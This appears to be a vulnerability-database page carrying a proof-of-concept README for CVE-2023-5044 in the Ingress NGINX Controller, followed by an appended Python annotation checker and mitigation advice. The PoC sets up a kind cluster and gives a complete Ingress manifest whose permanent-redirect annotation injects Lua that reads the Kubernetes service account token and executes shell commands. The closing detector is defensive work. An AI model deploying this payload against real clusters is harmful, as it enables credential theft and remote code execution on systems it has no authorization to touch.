
PoC details: ce4d4570310b49683fd1ac739abc23872741d835

Source
Related vulnerability
Title: Ingress NGINX Controller code injection vulnerability (CVE-2023-5044)
Description: Ingress NGINX Controller is an open-source ingress controller for Kubernetes. Ingress NGINX Controller contains a security vulnerability. An attacker can use this vulnerability to carry out a code injection attack.
Description: PoC for CVE-2023-5044
Introduction
# CVE-2023-5044
PoC for CVE-2023-5044

## Prerequisites
Kind: v0.20.0

Kubectl: v1.29.3

Docker: v26.0.0

## PoC
Give Docker the required permissions
```bash
sudo usermod -aG docker $USER && newgrp docker
```

Start the cluster with extraPortMapping and node-labels so that it is ready to run an ingress
```bash
cat <<EOF | kind create cluster --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: InitConfiguration
    nodeRegistration:
      kubeletExtraArgs:
        node-labels: "ingress-ready=true"
  extraPortMappings:
  - containerPort: 80
    hostPort: 80
    protocol: TCP
  - containerPort: 443
    hostPort: 443
    protocol: TCP
EOF
```

Install the nginx ingress controller
```bash
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml
```

.yaml file that sets up a simple http-echo service, without the ingress itself
```yaml
kind: Pod
apiVersion: v1
metadata:
  name: foo-app
  labels:
    app: foo
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: foo-app
---
kind: Service
apiVersion: v1
metadata:
  name: foo-service
spec:
  selector:
    app: foo
  ports:
  # Default port used by the image
  - port: 8080
---
kind: Pod
apiVersion: v1
metadata:
  name: bar-app
  labels:
    app: bar
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: bar-app
---
kind: Service
apiVersion: v1
metadata:
  name: bar-service
spec:
  selector:
    app: bar
  ports:
  # Default port used by the image
  - port: 8080
---
```

.yaml file for the ingress containing the exploit
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /$2
    nginx.ingress.kubernetes.io/permanent-redirect: https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/exploit(/|$)(.*)" { content_by_lua 'os.execute("touch /you")'
spec:
  rules:
  - http:
      paths:
      - pathType: Prefix
        path: /foo(/|$)(.*)
        backend:
          service:
            name: foo-service
            port:
              number: 8080
      - pathType: Prefix
        path: /bar(/|$)(.*)
        backend:
          service:
            name: bar-service
            port:
              number: 8080
```

"localhost/exploit" will now respond with the Service Account Token of the ingress-NGINX secret for the cluster.

File snapshot

```
[4.0K] /data/pocs/ce4d4570310b49683fd1ac739abc23872741d835 └── [2.7K] README.md 0 directories, 1 file
```
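The injection above works because the `permanent-redirect` value is copied into nginx.conf as a directive argument, so a `;` and `}` in it terminate the directive and the enclosing block and let the attacker open a new `location`. The check below is an added example (not part of this PoC or of ingress-nginx) that flags annotation values carrying such directive-breaking characters, and flags `*-snippet` annotations outright, before an Ingress is admitted; the sample annotation map is constructed from the manifest above, with the payload shortened.

```python
import re

# Characters that end an nginx directive or block and so let an annotation value
# escape the context it is rendered into (the vector used by CVE-2023-5044).
INJECTION_CHARS = re.compile(r"[;{}\r\n]")

NGINX_PREFIX = "nginx.ingress.kubernetes.io/"


def check_annotations(annotations: dict) -> list:
    """Return a list of (annotation_key, reason) findings for an Ingress.

    Only nginx.ingress.kubernetes.io/* annotations are inspected: snippet
    annotations are reported because they inject raw config by design; every
    other value is reported if it contains a directive-breaking character.
    """
    findings = []
    for key, value in annotations.items():
        if not key.startswith(NGINX_PREFIX):
            continue
        if key.endswith("-snippet"):
            findings.append((key, "snippet annotation injects raw nginx config by design"))
            continue
        match = INJECTION_CHARS.search(str(value))
        if match:
            findings.append((key, f"directive-breaking character {match.group()!r} at offset {match.start()}"))
    return findings


# Constructed sample: the annotations of exploit-ingress above, payload truncated.
SAMPLE_ANNOTATIONS = {
    "nginx.ingress.kubernetes.io/rewrite-target": "/$2",
    "nginx.ingress.kubernetes.io/permanent-redirect": 'https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {',
}

# Constructed benign counterpart: a redirect target that stays a single argument.
BENIGN_ANNOTATIONS = {
    "nginx.ingress.kubernetes.io/permanent-redirect": "https://example.com/new-home",
}

if __name__ == "__main__":
    for name, annotations in (("exploit-ingress", SAMPLE_ANNOTATIONS), ("benign", BENIGN_ANNOTATIONS)):
        for key, reason in check_annotations(annotations) or [(None, "no findings")]:
            print(f"{name}: {key}: {reason}")
```

Running the same check as a validating admission webhook stops the manifest before the controller ever renders it; independently, setting `allow-snippet-annotations: "false"` in the controller ConfigMap disables the snippet annotations the check flags by name.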